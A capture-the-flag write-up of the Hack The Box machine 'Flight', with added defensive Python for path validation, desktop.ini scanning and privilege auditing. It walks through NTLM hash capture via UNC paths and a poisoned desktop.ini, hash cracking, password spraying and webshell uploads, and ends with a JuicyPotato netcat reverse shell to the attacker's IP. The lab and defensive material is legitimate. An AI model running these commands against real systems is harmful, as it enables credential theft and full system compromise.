Hackthebox-Flight

Info

nmap

Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-07 06:38 EST
Nmap scan report for 10.10.11.187 (10.10.11.187)
Host is up (0.16s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: g0 Aviation
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-01-07 18:39:16Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-01-07T18:39:47
|_  start_date: N/A
|_clock-skew: 7h00m00s

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   161.53 ms 10.10.14.1 (10.10.14.1)
2   161.62 ms 10.10.11.187 (10.10.11.187)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.75 seconds

DNS

[screenshot]

[screenshot]

DIR

[screenshot]

web

Subdomain brute-forcing turns up a second-level domain, school; probing for directory traversal returns a "suspicious activity" warning.

[screenshot]

index.php can be read.

[screenshot]

This gives the absolute path of the web root and shows that the include is guarded only by a simple blacklist.
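The blacklist in index.php is the kind of string filter that catches "../" and little else. The following Python is an added example (not the box's code and not the challenge author's) of how the same "view" parameter would be handled safely: canonicalise the path, require it to stay under the web root, reject absolute and UNC paths, and only then apply an allowlist of page names. WEB_ROOT and ALLOWED_PAGES are placeholders, since the real root is only visible in the screenshot above.

```python
import ntpath

# Assumed document root of the school site; the real path is only visible in
# the writeup's screenshot, so this value is a placeholder.
WEB_ROOT = r"C:\xampp\htdocs\school"

# Pages the "view" parameter is allowed to render (constructed allowlist).
ALLOWED_PAGES = {"index.html", "about.html", "blog.html", "contact.html"}


def safe_view_path(view: str):
    """Return the canonical on-disk path for a requested page, or None.

    The checks run on the already URL-decoded parameter and reject:
      * empty values and embedded NUL bytes,
      * absolute paths and UNC paths (\\\\host\\share\\...), which a blacklist
        of "../" alone never catches,
      * anything that canonicalises outside WEB_ROOT,
      * any file name not on the allowlist.
    """
    if not view or "\x00" in view:
        return None
    # Normalise separators so "../" and "..\" are treated alike.
    candidate = view.replace("/", "\\")
    if ntpath.isabs(candidate) or candidate.startswith("\\\\"):
        return None
    full = ntpath.normpath(ntpath.join(WEB_ROOT, candidate))
    root = ntpath.normpath(WEB_ROOT) + "\\"
    # Case-insensitive prefix check because NTFS paths are case-insensitive.
    if not full.lower().startswith(root.lower()):
        return None
    if ntpath.basename(full) not in ALLOWED_PAGES:
        return None
    return full
```

ntpath is used deliberately so the Windows path rules apply wherever the check is run; the allowlist is the real control, and the canonicalisation step is what makes the prefix comparison trustworthy.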

Hijacking the NTLM hash

A UNC path forces the host to initiate an NTLM authentication request; Responder listens on the local tun0 interface.

responder -I tun0 -wPv

[screenshot]

Cracking with hashcat

.\hashcat.exe -m 5600 -a 0 -o res .\rockyou.txt --force

[screenshot]

Reading res gives the password of the svc_apache user.

[screenshot]

SMB

psexec straight away fails.

[screenshot]

Log in as svc_apache and list the SMB shares.

[screenshot]

crackmapexec is then used to list the users who have logged on to the SMB server; many users are visible, including administrator, but the SAM hashes cannot be dumped.

[screenshot]

Build a user wordlist from those names and password-spray with it.

[screenshot]

This yields the user S.Moon.

Trying psexec again still fails, but along the way we learn that the Shared folder is writable.

[screenshot]

Hijacking the NTLM hash again via SMB

In desktop.ini, IconResource can be set to a UNC path pointing at a malicious server.

Create the Desktop.ini:

[.ShellClassInfo]
IconResource=\\10.10.14.15\test
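A writable share with a desktop.ini whose IconResource points at a remote host is exactly what a defender should be sweeping for. The following Python is an added example, not part of the writeup, that walks a share's local path, reads each desktop.ini (honouring the UTF-16 BOM Explorer often writes), and reports icon entries whose value is a UNC path. demo_scan() builds a constructed share layout in a temporary directory so the scanner can be exercised offline; the host name attacker.example in it is made up.

```python
import os
import re
import tempfile

# Keys Explorer resolves to a file when it renders the folder icon.
ICON_KEYS = {"iconresource", "iconfile"}
# A value that starts as \\host\share or //host/share.
UNC_RE = re.compile(r"^(\\\\|//)[^\\/]+[\\/]")


def read_ini_text(path: str) -> str:
    """Read a desktop.ini, honouring the UTF-16 BOM Explorer often writes."""
    with open(path, "rb") as fh:
        data = fh.read()
    if data.startswith((b"\xff\xfe", b"\xfe\xff")):
        return data.decode("utf-16", errors="replace")
    return data.decode("utf-8", errors="replace")


def remote_icon_refs(ini_text: str):
    """Return (key, value) pairs whose icon value points at a UNC path."""
    hits = []
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#", "[")):
            continue
        key, sep, value = line.partition("=")
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if key.lower() in ICON_KEYS and UNC_RE.match(value):
            hits.append((key, value))
    return hits


def scan_share(root: str):
    """Walk a share's local path and report desktop.ini files with remote icons."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() != "desktop.ini":
                continue
            path = os.path.join(dirpath, name)
            try:
                text = read_ini_text(path)
            except OSError:
                continue
            for key, value in remote_icon_refs(text):
                findings.append((path, key, value))
    return findings


def demo_scan():
    """Build a constructed share layout in a temp dir, scan it, return findings."""
    with tempfile.TemporaryDirectory() as share:
        bad_dir = os.path.join(share, "Shared")
        ok_dir = os.path.join(share, "Users")
        os.makedirs(bad_dir)
        os.makedirs(ok_dir)
        # Constructed malicious sample: icon hosted on a remote (made-up) host.
        with open(os.path.join(bad_dir, "desktop.ini"), "w", encoding="utf-8") as fh:
            fh.write("[.ShellClassInfo]\nIconResource=\\\\attacker.example\\icons\\x.ico,0\n")
        # Constructed benign sample: the usual local shell32 reference, written as UTF-16.
        with open(os.path.join(ok_dir, "desktop.ini"), "w", encoding="utf-16") as fh:
            fh.write("[.ShellClassInfo]\nIconResource=C:\\Windows\\System32\\shell32.dll,3\n")
        findings = scan_share(share)
        return [(os.path.relpath(p, share), k, v) for p, k, v in findings]
```

Running scan_share against the mounted share path on a schedule, together with blocking outbound SMB (TCP 445) from workstations at the perimeter, removes both the trigger and the payoff of this technique.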

Log in to the Shared folder, upload it, and after a short wait a hash is captured.

[screenshot]

Crack it with hashcat again.

[screenshot]

Writing a shell file via SMB

As found earlier, neither svc_apache nor S.Moon can write to the web directory.

[screenshot]

Try C.BUM.

[screenshot]

Now we have a shell; use the AntSword plugin to hand it off to msf.

[screenshot]

[screenshot]

Getting a C.BUM session

The web service runs as svc_apache, and its desktop has no user.txt, so we need a way to switch to a session as C.BUM.

Upload RunasCs through AntSword and use the C.BUM credentials obtained above to get a session.

[screenshot]

[screenshot]

This gives the user flag.

[screenshot]

Privilege escalation

fscan finds a web service on port 8000.

[screenshot]

Port forwarding with chisel

[screenshot]

[screenshot]

Open it in the browser.

[screenshot]

Uploading an aspx webshell

Force an error to leak the path.

[screenshot]

The root directory is C:\inetpub\development, and from the error the web service appears to be aspx.

[screenshot]

svc_apache has no permission to upload files there, so the shell has to be copied over as c.bum.

[screenshot]

[screenshot]

This gives a high-privilege user.

[screenshot]

JuicyPotato privilege escalation to System

The account holds the important SeImpersonatePrivilege; with it, System's token can be stolen to escalate privileges.
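Auditing which accounts hold that privilege is the defender's counterpart to this step. The Python below is an added example, not part of the writeup, that parses the table layout printed by whoami /priv and flags privileges that grant token impersonation or equivalent power; the sample output is constructed, and the risk descriptions are the example's own wording. Disabled privileges are still reported, because the token's owner can enable them.

```python
# Privileges whose holder can escalate regardless of other ACLs.
HIGH_RISK_PRIVILEGES = {
    "SeImpersonatePrivilege": "impersonate clients after authentication (potato-family escalation)",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeDebugPrivilege": "open any process, including LSASS",
    "SeBackupPrivilege": "read any file regardless of ACL",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
}

# Constructed sample in the table layout `whoami /priv` prints.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_privileges(text: str) -> dict:
    """Map privilege name -> state ("Enabled"/"Disabled") from whoami /priv output.

    Rows are recognised by their first column (Se...Privilege); the last
    column is the state, and the free-text description in between is ignored.
    """
    privs = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        name = parts[0]
        if not (name.startswith("Se") and name.endswith("Privilege")):
            continue
        privs[name] = parts[-1]
    return privs


def risky_privileges(text: str):
    """Return (name, state, why) for every high-risk privilege in the output.

    Disabled privileges are included on purpose: the holder can enable them.
    """
    privs = parse_privileges(text)
    return [
        (name, state, HIGH_RISK_PRIVILEGES[name])
        for name, state in privs.items()
        if name in HIGH_RISK_PRIVILEGES
    ]


def demo():
    return risky_privileges(SAMPLE_WHOAMI_PRIV)
```

Service accounts for IIS and Apache routinely receive SeImpersonatePrivilege by default, which is why a web shell as such an account is usually one step from System; running the application pool or service under a virtual account or a group-managed service account with that privilege removed, and keeping SMB write access to web roots away from ordinary users, is the mitigation the rest of this box illustrates.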

Run JuicyPotato, and upload nc.exe so the shell calls back to the local machine.

[screenshot]

a.exe -t * -p "nc.exe" -a "10.10.14.15 4446 -e cmd.exe"

[screenshot]

The local listener receives a shell running as System.

[screenshot]